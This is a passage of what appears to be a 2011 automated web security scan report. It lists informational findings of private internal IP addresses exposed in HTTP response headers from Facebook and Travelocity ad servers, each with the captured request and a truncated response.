Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://hublotnation.com/2011/09/23/hublot-watchesa-look-at-the-king-power-dwayne-wade/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Sun, 02 Oct 2011 17:05:35 -0700
Pragma:
X-FB-Rev: 451912
X-FB-Server: 10.64.49.60
X-Cnection: close
Date: Mon, 03 Oct 2011 00:03:35 GMT
Content-Length: 386

fb_sharepro_render([{"url":"http:\/\/hublotnation.com\/2011\/09\/23\/hublot-watchesa-look-at-the-king-power-dwayne-wade\/","normalized_url":"http:\/\/www.hublotnation.com\/2011\/09\/23\/hublot-watches
...[SNIP]...

23.5. http://connect.facebook.net/en_US/all.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://connect.facebook.net
Path:   /en_US/all.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /en_US/all.js?_=1317601697719 HTTP/1.1
Host: connect.facebook.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "b3a408fe2b10f28c89a05ef6347c2f17"
X-FB-Server: 10.27.220.114
X-Cnection: close
Content-Length: 139391
Cache-Control: public, max-age=1176
Expires: Mon, 03 Oct 2011 00:48:20 GMT
Date: Mon, 03 Oct 2011 00:28:44 GMT
Connection: close
Vary: Accept-Encoding

/*1317601700,169598066,JIT Construction: v451912,en_US*/

if(!window.FB)window.FB={_apiKey:null,_session:null,_userStatus:'unknown',_logging:true,_inCanvas:((window.location.search.indexOf('fb_sig_in_
...[SNIP]...

23.6. http://connect.facebook.net/rsrc.php/v1/yK/r/RIxWozDt5Qq.swf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://connect.facebook.net
Path:   /rsrc.php/v1/yK/r/RIxWozDt5Qq.swf

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yK/r/RIxWozDt5Qq.swf HTTP/1.1
Host: connect.facebook.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://hublotnation.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
If-Modified-Since: Thu, 04 Aug 2011 21:10:10 GMT

Response

HTTP/1.1 200 OK
Content-Length: 3289
Content-Type: application/x-shockwave-flash
Last-Modified: Thu, 04 Aug 2011 21:10:10 GMT
X-FB-Server: 10.27.178.109
X-Cnection: close
Cache-Control: public, max-age=237477
Expires: Wed, 05 Oct 2011 18:00:15 GMT
Date: Mon, 03 Oct 2011 00:02:18 GMT
Connection: close

CWS.....x.}X.W.Yz._.n.$@B 0.Qnd.p!    ...l3...0.....m.P.t..-U1R    pOO...I.g..d.3..U6Yd.Mrf.....n...&.e.?..n.@..    ....w...
.....t.=!.@..N.B~..w .F.dg.....Z.idqw.B..6.....Vj.R....'.]...L...&.b......    .1ra..p.5
...[SNIP]...

23.7. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529178&tile=711446054649628&section=results

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529178&tile=711446054649628&section=results

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529178&tile=711446054649628&section=results HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?Service=TRAVELOCITY&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR&leavingDate=mm/dd/yyyy&returningDate=mm/dd/yyyy&city=bos&cityCountryCode=US&dateFormat=mm/dd/yyyy&searchMode=city&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; IPE_S_TMP_910=910; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=check#true#1317600587|session#1317600481056-80236#1317602387|PC#1317600481056-80236.19#1318810127; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.1.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:00 GMT
Server: Apache
X-Server: prdlmn4008
AdServer: 10.28.75.14:9678:1
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:09:00 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 1
Content-Type: text/html


23.8. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771877&tile=128609801075344&section=results

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771877&tile=128609801075344&section=results

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771877&tile=128609801075344&section=results HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=session#1317600481056-80236#1317602632|PC#1317600481056-80236.19#1318810372|check#true#1317600832; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.3.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:26 GMT
Server: Apache
X-Server: prdlmn0408
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:14:26 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 2262
Content-Type: text/html

<IFRAME SRC="http://ad.doubleclick.net/adi/N6333.1207.TRAVELOCITY.COM/B5568861.2;sz=160x600;click=http://dm.travelocity.com/event.ng/Type%3dclick%26FlightID%3d127075%26AdID%3d169968%26TargetID%3d32592
...[SNIP]...

23.9. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&random=656365&tile=564238840132219&section=details

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&random=656365&tile=564238840132219&section=details

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&random=656365&tile=564238840132219&section=details HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelDetail.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?tab=guide&tripType=hotel&propertyId=4810&airport=BOS&resetReview=true&hotelQKey=-2237575859332798600&tsHotelQKey=-2237575859332798600&reviewPage=reviewStart&locLink=HOTEL.HOTELAVAILABILITYLISTLITE1|NAT1&dr=4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; IPE_S_TMP_910=910; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.1.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998; mbox=session#1317600481056-80236#1317602524|PC#1317600481056-80236.19#1318810264|check#true#1317600724

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:12:46 GMT
Server: Apache
X-Server: prdlmn2714
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:12:46 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 2276
Content-Type: text/html

<IFRAME SRC="http://ad.doubleclick.net/adi/N6333.1207.TRAVELOCITY.COM/B5568861.2;sz=160x600;click=http://dm.travelocity.com/event.ng/Type%3dclick%26FlightID%3d127075%26AdID%3d169968%26TargetID%3d32592
...[SNIP]...

23.10. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?Service=TRAVELOCITY&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR&leavingDate=mm/dd/yyyy&returningDate=mm/dd/yyyy&city=bos&cityCountryCode=US&dateFormat=mm/dd/yyyy&searchMode=city&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; IPE_S_TMP_910=910; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=check#true#1317600587|session#1317600481056-80236#1317602387|PC#1317600481056-80236.19#1318810127; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.1.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:01 GMT
Server: Apache
X-Server: prdlmn0408
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:09:01 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 239
Content-Type: text/html

<script type="text/javascript">
var pubId=26071;
var siteId=26072;
var kadId=21044;
var kadwidth=160;
var kadheight=600;
var kadtype=1;
</script>
<script type="text/javascript" src="http://ads.pubmati
...[SNIP]...

23.11. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771875&tile=128609801075344&section=results

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771875&tile=128609801075344&section=results

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771875&tile=128609801075344&section=results HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=session#1317600481056-80236#1317602632|PC#1317600481056-80236.19#1318810372|check#true#1317600832; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.3.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:28 GMT
Server: Apache
X-Server: prdlmn2714
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:14:28 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 239
Content-Type: text/html

<script type="text/javascript">
var pubId=26071;
var siteId=26072;
var kadId=21044;
var kadwidth=160;
var kadheight=600;
var kadtype=1;
</script>
<script type="text/javascript" src="http://ads.pubmati
...[SNIP]...

23.12. http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=529164&tile=711446054649628&section=results

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=529164&tile=711446054649628&section=results

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=529164&tile=711446054649628&section=results HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?Service=TRAVELOCITY&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR&leavingDate=mm/dd/yyyy&returningDate=mm/dd/yyyy&city=bos&cityCountryCode=US&dateFormat=mm/dd/yyyy&searchMode=city&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; IPE_S_TMP_910=910; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=check#true#1317600587|session#1317600481056-80236#1317602387|PC#1317600481056-80236.19#1318810127; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.1.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:01 GMT
Server: Apache
X-Server: prdlmn0408
AdServer: 10.28.75.14:9678:1
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:09:01 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 1
Content-Type: text/html


23.13. http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=771852&tile=128609801075344&section=results

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=771852&tile=128609801075344&section=results

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=771852&tile=128609801075344&section=results HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=session#1317600481056-80236#1317602632|PC#1317600481056-80236.19#1318810372|check#true#1317600832; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.3.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:25 GMT
Server: Apache
X-Server: prdlmn2714
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:14:25 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 238
Content-Type: text/html

<script type="text/javascript">
var pubId=26071;
var siteId=26072;
var kadId=21043;
var kadwidth=728;
var kadheight=90;
var kadtype=1;
</script>
<script type="text/javascript" src="http://ads.pubmatic
...[SNIP]...

23.14. http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&adloc=NA&random=656361&tile=564238840132219&section=details

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&adloc=NA&random=656361&tile=564238840132219&section=details

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&adloc=NA&random=656361&tile=564238840132219&section=details HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelDetail.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?tab=guide&tripType=hotel&propertyId=4810&airport=BOS&resetReview=true&hotelQKey=-2237575859332798600&tsHotelQKey=-2237575859332798600&reviewPage=reviewStart&locLink=HOTEL.HOTELAVAILABILITYLISTLITE1|NAT1&dr=4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; IPE_S_TMP_910=910; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.1.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998; mbox=session#1317600481056-80236#1317602524|PC#1317600481056-80236.19#1318810264|check#true#1317600724

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:12:44 GMT
Server: Apache
X-Server: prdlmn2714
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:12:44 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 238
Content-Type: text/html

<script type="text/javascript">
var pubId=26071;
var siteId=26072;
var kadId=21043;
var kadwidth=728;
var kadheight=90;
var kadtype=1;
</script>
<script type="text/javascript" src="http://ads.pubmatic
...[SNIP]...

23.15. http://dm.travelocity.com/html.ng/site=travelocity&adsize=728x90&cobrand=TRAVELOCITY&area=homepage&Section=frontdoor&tile=60048504&random=-99147040413176

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/site=travelocity&adsize=728x90&cobrand=TRAVELOCITY&area=homepage&Section=frontdoor&tile=60048504&random=-99147040413176

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /html.ng/site=travelocity&adsize=728x90&cobrand=TRAVELOCITY&area=homepage&Section=frontdoor&tile=60048504&random=-99147040413176? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:13 GMT
Server: Apache
X-Server: prdlmn3110
AdServer: 10.28.75.14:9678:1
